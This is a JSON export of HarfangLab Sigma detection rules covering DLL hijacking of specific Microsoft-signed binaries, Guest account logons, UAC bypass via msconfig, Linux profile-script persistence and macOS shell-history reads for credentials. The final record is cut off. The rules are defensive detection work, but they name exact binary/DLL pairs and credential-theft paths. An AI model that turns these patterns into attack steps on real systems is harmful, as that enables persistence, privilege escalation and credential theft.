"id": "7c7e9058-75b9-4939-9ef9-b2e9ed96ba71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088675Z",
"creation_date": "2026-03-23T11:45:34.088677Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088681Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_easpolicymanagerbrokerhost.yml",
"content": "title: DLL Hijacking via easpolicymanagerbrokerhost.exe\nid: 7c7e9058-75b9-4939-9ef9-b2e9ed96ba71\ndescription: |\n Detects potential Windows DLL Hijacking via easpolicymanagerbrokerhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'easpolicymanagerbrokerhost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\InprocLogger.dll'\n - '\\policymanager.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7c7e9058-75b9-4939-9ef9-b2e9ed96ba71",
"rule_name": "DLL Hijacking via easpolicymanagerbrokerhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via easpolicymanagerbrokerhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nThe rule does not fire when the loaded DLL is itself signed by Microsoft Windows or resides under System32, SysWOW64 or WinSxS.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7cb0cf75-a365-4572-8532-982bf3b0ac2b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075638Z",
"creation_date": "2026-03-23T11:45:34.075640Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075645Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#guest",
"https://attack.mitre.org/techniques/T1078/001/"
],
"name": "t1078_001_guest_account_authentication.yml",
"content": "title: Guest Account Authentication\nid: 7cb0cf75-a365-4572-8532-982bf3b0ac2b\ndescription: |\n Detects authentication of the guest account.\n This account is disabled by default and can be used by attackers to maintain access to victim system via a persistence.\n It is recommended to investigate action made within the newly created session.\nreferences:\n - https://learn.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts#guest\n - https://attack.mitre.org/techniques/T1078/001/\ndate: 2024/01/04\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.initial_access\n - attack.t1078.001\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n service: security\ndetection:\n selection_eventid:\n Source: 'Microsoft-Windows-Security-Auditing'\n EventID: 4624\n LogonType:\n - '3'\n - '10'\n\n selection_account:\n - TargetUserSid|endswith: '-501'\n - SubjectUserSid|endswith: '-501'\n\n condition: all of selection_*\nlevel: medium\nconfidence: weak",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7cb0cf75-a365-4572-8532-982bf3b0ac2b",
"rule_name": "Guest Account Authentication",
"rule_description": "Detects a successful network (logon type 3) or RemoteInteractive (logon type 10) authentication by the built-in Guest account (RID 501).\nThis account is disabled by default and can be enabled by attackers to maintain persistent access to the victim system.\nIt is recommended to investigate the actions performed within the newly created session.\n",
"rule_creation_date": "2024-01-04",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.initial_access",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7d08cd8e-c2ae-417e-9c41-f658cc4b2ae3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601191Z",
"creation_date": "2026-03-23T11:45:34.601194Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601202Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fveprompt.yml",
"content": "title: DLL Hijacking via fveprompt.exe\nid: 7d08cd8e-c2ae-417e-9c41-f658cc4b2ae3\ndescription: |\n Detects potential Windows DLL Hijacking via fveprompt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fveprompt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\FVEAPI.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7d08cd8e-c2ae-417e-9c41-f658cc4b2ae3",
"rule_name": "DLL Hijacking via fveprompt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fveprompt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nThe rule does not fire when the loaded DLL is itself signed by Microsoft Windows or resides under System32, SysWOW64 or WinSxS.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7d4609c4-41cd-4b61-90e3-fb44e96e7305",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077548Z",
"creation_date": "2026-03-23T11:45:34.077550Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077554Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_post_uac_bypass_msconfig.yml",
"content": "title: UAC Bypass Executed via msconfig\nid: 7d4609c4-41cd-4b61-90e3-fb44e96e7305\ndescription: |\n Detects a suspicious process execution by msconfig.exe.\n msconfig.exe is often abused by attackers for UAC bypasses due to its auto-elevate feature.\n It is recommended to investigate the newly created process and check for malicious behavior.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2024/10/08\nmodified: 2025/01/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Msconfig\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ProcessGrandparentIntegrityLevel: 'Medium'\n ProcessParentIntegrityLevel: 'High'\n ProcessIntegrityLevel: 'High'\n ProcessParentImage:\n - '?:\\windows\\system32\\msconfig.exe'\n - '?:\\windows\\SysWOW64\\msconfig.exe'\n\n filter_grand_parent:\n ProcessGrandparentImage:\n - '?:\\windows\\explorer.exe'\n - '?:\\Windows\\System32\\RuntimeBroker.exe'\n - '?:\\Windows\\System32\\control.exe'\n - '?:\\Windows\\System32\\CompMgmtLauncher.exe'\n\n filter_legitime_child:\n ProcessImage:\n - '?:\\windows\\System32\\Taskmgr.exe'\n - '?:\\WINDOWS\\system32\\mmc.exe'\n - '?:\\WINDOWS\\system32\\eventvwr.exe'\n - '?:\\WINDOWS\\system32\\control.exe'\n - '?:\\WINDOWS\\system32\\UserAccountControlSettings.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7d4609c4-41cd-4b61-90e3-fb44e96e7305",
"rule_name": "UAC Bypass Executed via msconfig",
"rule_description": "Detects a suspicious process execution by msconfig.exe.\nmsconfig.exe is often abused by attackers for UAC bypasses due to its auto-elevate feature.\nIt is recommended to investigate the newly created process and check for malicious behavior.\n",
"rule_creation_date": "2024-10-08",
"rule_modified_date": "2025-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7db54556-f600-4f15-a4cb-a45837a6edc6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 1,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.622557Z",
"creation_date": "2026-03-23T11:45:34.596737Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.596745Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md#atomic-test-1---add-command-to-bash_profile",
"https://attack.mitre.org/techniques/T1546/004/"
],
"name": "t1546_004_user_profile_modified_linux.yml",
"content": "title: User Profile Modified\nid: 7db54556-f600-4f15-a4cb-a45837a6edc6\ndescription: |\n Detects an attempt to modify any of the user profile scripts, .profile, .bash_profile or .bash_login.\n These scripts contain commands for setting environment variables.\n Adversaries can establish persistence by adding a malicious binary path or shell commands to these files.\n It is recommended to analyze the process responsible for the edition of the profile script as well as to investigate the changes made to the files to look for malicious commands by downloading the affected files via a \"Download file\" job.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md#atomic-test-1---add-command-to-bash_profile\n - https://attack.mitre.org/techniques/T1546/004/\ndate: 2023/01/03\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.004\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.ConfigChange\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_write:\n Kind: 'access'\n Permissions: 'write'\n Path:\n - '/root/.profile'\n - '/root/.bash_profile'\n - '/root/.bash_login'\n - '/home/*/.profile'\n - '/home/*/.bash_profile'\n - '/home/*/.bash_login'\n\n selection_misc:\n Kind:\n - 'rename'\n - 'symlink'\n - 'hardlink'\n TargetPath:\n - '/root/.profile'\n - '/root/.bash_profile'\n - '/root/.bash_login'\n - '/home/*/.profile'\n - '/home/*/.bash_profile'\n - '/home/*/.bash_login'\n\n exclusion_common:\n ProcessImage:\n - '/usr/sbin/luserdel'\n - '/usr/sbin/luseradd'\n - '/usr/bin/tar'\n - '/usr/bin/podman'\n - '/usr/bin/rsync'\n\n exclusion_useradd:\n - ProcessImage: '/usr/sbin/useradd'\n - ProcessCommandLine|startswith:\n - '/usr/bin/perl /usr/sbin/adduser '\n - '/usr/bin/perl -T /usr/sbin/adduser '\n\n exclusion_docker:\n - ProcessImage:\n - 
'/usr/local/bin/dockerd'\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/snap/docker/*/bin/dockerd'\n - '/bin/containerd'\n - '/usr/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '/usr/bin/containerd-shim-runc-v2'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback --port-driver=builtin --copy-up=/etc --copy-up=/run --propagation=rslave /home//bin/dockerd-rootless.sh\n - ProcessImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n - ProcessParentImage:\n - '/usr/bin/rootlesskit'\n - '/home/*/bin/rootlesskit'\n - '/home/*/.bin/rootlesskit'\n\n exclusion_oddjob:\n ProcessImage: '/usr/libexec/oddjob/mkhomedir'\n\n exclusion_yocto:\n ProcessImage|startswith: '/opt/yocto/'\n\n exclusion_mkhomedir:\n ProcessImage:\n - '/usr/sbin/mkhomedir_helper'\n - '/sbin/mkhomedir_helper'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_dnf:\n ProcessCommandLine: '/usr/libexec/platform-python /bin/dnf * distro-sync'\n\n exclusion_edutice:\n ProcessCommandLine: '/usr/bin/python3 /usr/lib/edutice/service/main.py'\n\n exclusion_kaniko:\n ProcessImage: '/kaniko/executor'\n\n exclusion_tomcat:\n - ProcessCommandLine|contains: '/opt/tomcat/bin/tomcat-create-instance.ksh'\n - ProcessParentCommandLine|contains: '/opt/tomcat/bin/tomcat-create-instance.ksh'\n\n exclusion_puppet:\n ProcessParentImage|startswith: '/opt/puppetlabs/'\n\n exclusion_siham:\n ProcessImage: '/usr/lib/jvm/*/bin/java'\n ProcessParentCommandLine|contains: '/lanceJava.ksh fr.amue.siham.outils.InstallerPackageClient'\n Path: '/home/hr*/.profile'\n\n exclusion_commandline:\n - ProcessParentCommandLine|contains: 'bash -c . ${HOME}/.bash_profile;cd /var/opt/data/flat/'\n - ProcessGrandparentCommandLine|contains: 'bash -c . 
${HOME}/.bash_profile;cd /var/opt/data/flat/'\n\n exclusion_cron:\n ProcessAncestors|endswith: '|/usr/sbin/cron|/lib/systemd/systemd'\n\n exclusion_apt:\n ProcessAncestors|contains: '|/usr/bin/apt-get|'\n\n exclusion_temp_file:\n - ProcessImage: '/usr/bin/sed'\n Path|endswith: '/sed??????'\n - ProcessImage: '/usr/bin/sed'\n TargetPath|endswith: '/sed??????'\n\n condition: 1 of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7db54556-f600-4f15-a4cb-a45837a6edc6",
"rule_name": "User Profile Modified",
"rule_description": "Detects an attempt to modify any of the user profile scripts, .profile, .bash_profile or .bash_login.\nThese scripts contain commands for setting environment variables.\nAdversaries can establish persistence by adding a malicious binary path or shell commands to these files.\nIt is recommended to analyze the process responsible for the modification of the profile script, as well as to investigate the changes made to the files and look for malicious commands by downloading the affected files via a \"Download file\" job.\n",
"rule_creation_date": "2023-01-03",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7dc2e5be-5fde-4138-a05f-7237bf36c9d9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600529Z",
"creation_date": "2026-03-23T11:45:34.600532Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600540Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_utcdecoderhost.yml",
"content": "title: DLL Hijacking via utcdecoderhost.exe\nid: 7dc2e5be-5fde-4138-a05f-7237bf36c9d9\ndescription: |\n Detects potential Windows DLL Hijacking via utcdecoderhost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'utcdecoderhost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7dc2e5be-5fde-4138-a05f-7237bf36c9d9",
"rule_name": "DLL Hijacking via utcdecoderhost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via utcdecoderhost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7dfd0c62-de07-4ea0-a8e7-2abe922f07b1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628265Z",
"creation_date": "2026-03-23T11:45:34.628267Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628271Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/003/"
],
"name": "t1552_003_shell_history_read_macos.yml",
"content": "title: Shell History File Read (macOS)\nid: 7dfd0c62-de07-4ea0-a8e7-2abe922f07b1\ndescription: |\n Detects an attempt to read any of the common shell history files.\n Those files contains the most recent commands executed by the user and can be used by an attacker to look for unsecured credentials.\n It is recommended to verify if the process performing the read operation has legitimate reason to do it.\nreferences:\n - https://attack.mitre.org/techniques/T1552/003/\ndate: 2024/06/18\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n Path|endswith:\n - '.history'\n - '.bash_history'\n - '.sh_history'\n - '.zsh_history'\n ProcessImage|contains: '?'\n Kind: 'read'\n\n filter_shell:\n ProcessImage|endswith:\n - '/bin/zsh'\n - '/bin/bash'\n - '/bin/sh'\n - '/Applications/Warp.app/Contents/MacOS/stable'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - 